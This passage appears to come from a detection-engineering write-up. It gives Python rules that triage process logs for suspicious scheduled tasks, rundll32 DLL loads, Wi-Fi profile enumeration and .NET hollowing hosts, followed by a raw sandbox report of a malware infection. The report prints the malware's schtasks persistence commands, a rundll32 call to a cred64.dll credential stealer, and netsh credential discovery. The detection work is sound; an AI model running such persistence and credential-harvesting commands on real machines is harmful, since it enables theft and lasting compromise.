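parent=C:\Windows\System32\rundll32.exe|image=C:\Windows\System32\netsh.exe|cmdline=netsh wlan show profiles
parent=C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe|image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe|cmdline="C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\netsh.exe|cmdline=netsh wlan show profiles
parent=C:\Windows\System32\svchost.exe|image=C:\Windows\System32\rundll32.exe|cmdline="C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL
parent=C:\Program Files\Vendor\setup.exe|image=C:\Windows\System32\schtasks.exe|cmdline=schtasks /create /tn "Vendor Update" /tr "C:\Program Files\Vendor\update.exe" /sc DAILY
"""


def parse(line: str) -> dict:
    """key=value fields separated by '|' (constructed layout for this example)."""
    rec = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        rec[key.strip()] = value.strip()
    return rec


def image_name(path: str) -> str:
    return ntpath.basename(path.strip('"')).lower()


def _args_after_image(cmdline: str) -> str:
    """Everything after the (optionally quoted) image token."""
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1).strip() if m else ""


def check_scheduled_task(rec):
    """schtasks /create with /rl HIGHEST whose /tr target lives in a user-writable directory."""
    if image_name(rec["image"]) != "schtasks.exe":
        return None
    cl = rec["cmdline"]
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cl, re.I)
    target = (m.group(1) or m.group(2)) if m else ""
    if re.search(r"/rl\s+highest", cl, re.I) and USER_WRITABLE.match(target):
        return ("task_highest_userdir", f"task runs {target} with highest run level")
    return None


def check_rundll32(rec):
    """rundll32 <dll>,<export> where the DLL sits under ProgramData or a user's AppData."""
    if image_name(rec["image"]) != "rundll32.exe":
        return None
    m = re.match(r'^"?([^",]+?)"?\s*,\s*(\S+)', _args_after_image(rec["cmdline"]))
    if m and USER_WRITABLE.match(m.group(1)):
        return ("rundll32_userdir_dll", f"rundll32 loads {m.group(1)} export {m.group(2)}")
    return None


def check_wifi_profiles(rec):
    """netsh wlan show profile(s) spawned by something other than an interactive shell."""
    if image_name(rec["image"]) != "netsh.exe":
        return None
    if not re.search(r"wlan\s+show\s+profiles?", rec["cmdline"], re.I):
        return None
    parent = image_name(rec["parent"])
    if parent in INTERACTIVE_SHELLS:
        return None      # a user typing it; worth a lower-severity rule, not this one
    return ("wifi_profiles_nonshell", f"netsh wlan profile enumeration spawned by {parent}")


def check_dotnet_host(rec):
    """A .NET utility started by a binary in a user-writable directory; no arguments means
    there is nothing legitimate to register or build, the classic hollowing host."""
    if image_name(rec["image"]) not in DOTNET_HOSTS:
        return None
    if not USER_WRITABLE.match(rec["parent"].strip('"')):
        return None
    args = _args_after_image(rec["cmdline"])
    how = "no arguments (injection host)" if not args else f"args {args!r}"
    return ("dotnet_host_from_userdir",
            f"{image_name(rec['image'])} started by {image_name(rec['parent'])} with {how}")


CHECKS = (check_scheduled_task, check_rundll32, check_wifi_profiles, check_dotnet_host)


def triage(log_text: str):
    """Return (rule, image, detail) for every record that trips a check, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse(line)
        for check in CHECKS:
            hit = check(rec)
            if hit:
                hits.append((hit[0], image_name(rec["image"]), hit[1]))
    return hits


if __name__ == "__main__":
    for rule, image, detail in triage(LOG):
        print(f"{rule:26} {image:14} {detail}")
```

On the constructed log the four report-derived lines each produce one hit and the three look-alikes produce none; the netsh-from-cmd.exe case is left out on purpose, since the report's signal is the parent (rundll32 hosting a DLL from Roaming), not the command by itself. The WerFault.exe entries in the tree are not in the rules: they are crash reporting for 2531414c80.exe, MPGPH131.exe and swiiiii.exe and carry no signal beyond the PIDs involved.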
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
